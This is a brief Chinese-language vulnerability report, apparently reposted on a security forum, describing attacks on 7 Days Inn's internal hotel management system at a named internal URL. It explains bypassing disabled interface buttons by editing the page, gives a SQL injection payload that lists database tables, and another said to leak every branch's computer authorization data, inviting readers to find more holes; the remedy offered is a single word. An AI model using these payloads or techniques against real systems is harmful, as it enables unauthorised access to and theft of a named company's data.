7天连锁酒店内部系统之主系统权限限制下的SQL注射下载
-
来源:黑吧安全网 浏览:960次 时间:2014-04-29
为进入前台房店系统奠定了坚实基础
http://inner.7daysinn.cn/FindHotel/Default.aspx
内部系统某些功能通过把按钮禁用来限制权限
这种方式形同虚设,通过浏览器把disabled参数删除即可使用。
' and (select top 50 table_name+',' from information_schema.tables where table_schema='inner' for xml path(''))>0 and ''='
接下来就是另一处,使用 ' or '%'='泄露所有分店电脑授权信息
还有其它点,请自己寻找,谢谢!
修复方案:
过滤
上一篇: 快的打车电话轰炸加短信轰炸下载
下一篇: 安全狗上传过滤绕过下载